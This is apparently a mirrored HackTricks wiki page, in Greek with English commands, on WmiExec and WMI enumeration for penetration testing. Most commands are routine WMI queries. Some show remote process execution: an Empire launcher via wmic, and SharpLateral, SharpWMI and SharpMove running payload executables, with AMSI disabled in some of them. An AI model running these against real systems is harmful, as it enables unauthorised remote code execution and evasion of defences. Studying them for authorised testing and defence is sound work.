mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	
		
			
				
	
	
		
			127 lines
		
	
	
		
			7.5 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			127 lines
		
	
	
		
			7.5 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
# WmiExec
 | 
						||
 | 
						||
{{#include ../../banners/hacktricks-training.md}}
 | 
						||
 | 
						||
## Πώς Λειτουργεί
 | 
						||
 | 
						||
Διεργασίες μπορούν να ανοιχτούν σε hosts όπου το όνομα χρήστη και είτε ο κωδικός πρόσβασης είτε το hash είναι γνωστά μέσω της χρήσης του WMI. Οι εντολές εκτελούνται χρησιμοποιώντας το WMI από το Wmiexec, παρέχοντας μια ημι-διαδραστική εμπειρία shell.
 | 
						||
 | 
						||
**dcomexec.py:** Χρησιμοποιώντας διαφορετικά DCOM endpoints, αυτό το script προσφέρει μια ημι-διαδραστική shell παρόμοια με το wmiexec.py, εκμεταλλευόμενο συγκεκριμένα το αντικείμενο ShellBrowserWindow DCOM. Υποστηρίζει επί του παρόντος τα αντικείμενα MMC20. Application, Shell Windows και Shell Browser Window. (source: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
 | 
						||
 | 
						||
## Βασικές Αρχές WMI
 | 
						||
 | 
						||
### Namespace
 | 
						||
 | 
						||
Δομημένο σε ιεραρχία τύπου καταλόγου, το κορυφαίο επίπεδο του WMI είναι το \root, κάτω από το οποίο οργανώνονται πρόσθετοι κατάλογοι, που αναφέρονται ως namespaces.
 | 
						||
Εντολές για την καταγραφή namespaces:
 | 
						||
```bash
 | 
						||
# Retrieval of Root namespaces
 | 
						||
gwmi -namespace "root" -Class "__Namespace" | Select Name
 | 
						||
 | 
						||
# Enumeration of all namespaces (administrator privileges may be required)
 | 
						||
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace
 | 
						||
 | 
						||
# Listing of namespaces within "root\cimv2"
 | 
						||
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
 | 
						||
```
 | 
						||
Οι κλάσεις μέσα σε ένα namespace μπορούν να απαριθμηθούν χρησιμοποιώντας:
 | 
						||
```bash
 | 
						||
gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
 | 
						||
gwmi -Namespace "root/microsoft" -List -Recurse
 | 
						||
```
 | 
						||
### **Classes**
 | 
						||
 | 
						||
Η γνώση ενός ονόματος κλάσης WMI, όπως το win32_process, και του ονόματος του namespace στο οποίο ανήκει είναι κρίσιμη για οποιαδήποτε WMI λειτουργία.  
 | 
						||
Εντολές για να καταγράψετε τις κλάσεις που αρχίζουν με `win32`:
 | 
						||
```bash
 | 
						||
Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
 | 
						||
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
 | 
						||
```
 | 
						||
Κλήση μιας κλάσης:
 | 
						||
```bash
 | 
						||
# Defaults to "root/cimv2" when namespace isn't specified
 | 
						||
Get-WmiObject -Class win32_share
 | 
						||
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
 | 
						||
```
 | 
						||
### Μέθοδοι
 | 
						||
 | 
						||
Οι μέθοδοι, οι οποίες είναι μία ή περισσότερες εκτελέσιμες συναρτήσεις των κλάσεων WMI, μπορούν να εκτελούνται.
 | 
						||
```bash
 | 
						||
# Class loading, method listing, and execution
 | 
						||
$c = [wmiclass]"win32_share"
 | 
						||
$c.methods
 | 
						||
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")
 | 
						||
```
 | 
						||
 | 
						||
```bash
 | 
						||
# Method listing and invocation
 | 
						||
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
 | 
						||
```
 | 
						||
## WMI Enumeration
 | 
						||
 | 
						||
### WMI Service Status
 | 
						||
 | 
						||
Εντολές για να επαληθεύσετε αν η υπηρεσία WMI είναι λειτουργική:
 | 
						||
```bash
 | 
						||
# WMI service status check
 | 
						||
Get-Service Winmgmt
 | 
						||
 | 
						||
# Via CMD
 | 
						||
net start | findstr "Instrumentation"
 | 
						||
```
 | 
						||
### Πληροφορίες Συστήματος και Διαδικασίας
 | 
						||
 | 
						||
Gathering system and process information through WMI:
 | 
						||
```bash
 | 
						||
Get-WmiObject -ClassName win32_operatingsystem | select * | more
 | 
						||
Get-WmiObject win32_process | Select Name, Processid
 | 
						||
```
 | 
						||
Για τους επιτιθέμενους, το WMI είναι ένα ισχυρό εργαλείο για την καταμέτρηση ευαίσθητων δεδομένων σχετικά με συστήματα ή τομείς.
 | 
						||
```bash
 | 
						||
wmic computerystem list full /format:list
 | 
						||
wmic process list /format:list
 | 
						||
wmic ntdomain list /format:list
 | 
						||
wmic useraccount list /format:list
 | 
						||
wmic group list /format:list
 | 
						||
wmic sysaccount list /format:list
 | 
						||
```
 | 
						||
Η απομακρυσμένη ερώτηση του WMI για συγκεκριμένες πληροφορίες, όπως οι τοπικοί διαχειριστές ή οι συνδεδεμένοι χρήστες, είναι εφικτή με προσεκτική κατασκευή εντολών.
 | 
						||
 | 
						||
### **Χειροκίνητη Απομακρυσμένη Ερώτηση WMI**
 | 
						||
 | 
						||
Η διακριτική αναγνώριση τοπικών διαχειριστών σε μια απομακρυσμένη μηχανή και συνδεδεμένων χρηστών μπορεί να επιτευχθεί μέσω συγκεκριμένων ερωτήσεων WMI. Το `wmic` υποστηρίζει επίσης την ανάγνωση από ένα αρχείο κειμένου για την εκτέλεση εντολών σε πολλαπλούς κόμβους ταυτόχρονα.
 | 
						||
 | 
						||
Για να εκτελέσετε απομακρυσμένα μια διαδικασία μέσω WMI, όπως η ανάπτυξη ενός πράκτορα Empire, χρησιμοποιείται η παρακάτω δομή εντολής, με την επιτυχία της εκτέλεσης να υποδεικνύεται από μια τιμή επιστροφής "0":
 | 
						||
```bash
 | 
						||
wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
 | 
						||
```
 | 
						||
Αυτή η διαδικασία απεικονίζει την ικανότητα του WMI για απομακρυσμένη εκτέλεση και καταμέτρηση συστήματος, επισημαίνοντας τη χρησιμότητά του τόσο για τη διαχείριση συστημάτων όσο και για το pentesting.
 | 
						||
 | 
						||
## Αυτόματα Εργαλεία
 | 
						||
 | 
						||
- [**SharpLateral**](https://github.com/mertdas/SharpLateral):
 | 
						||
```bash
 | 
						||
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 | 
						||
```
 | 
						||
- [**SharpWMI**](https://github.com/GhostPack/SharpWMI)
 | 
						||
```bash
 | 
						||
SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command=""C:\\temp\\process.exe [args]"" [amsi=disable] [result=true]
 | 
						||
# Stealthier execution with VBS
 | 
						||
SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
 | 
						||
```
 | 
						||
- [**https://github.com/0xthirteen/SharpMove**](https://github.com/0xthirteen/SharpMove):
 | 
						||
```bash
 | 
						||
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
 | 
						||
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
 | 
						||
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
 | 
						||
```
 | 
						||
- Μπορείτε επίσης να χρησιμοποιήσετε **Impacket's `wmiexec`**.
 | 
						||
 | 
						||
 | 
						||
## Αναφορές
 | 
						||
 | 
						||
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 | 
						||
 | 
						||
 | 
						||
{{#include ../../banners/hacktricks-training.md}}
 |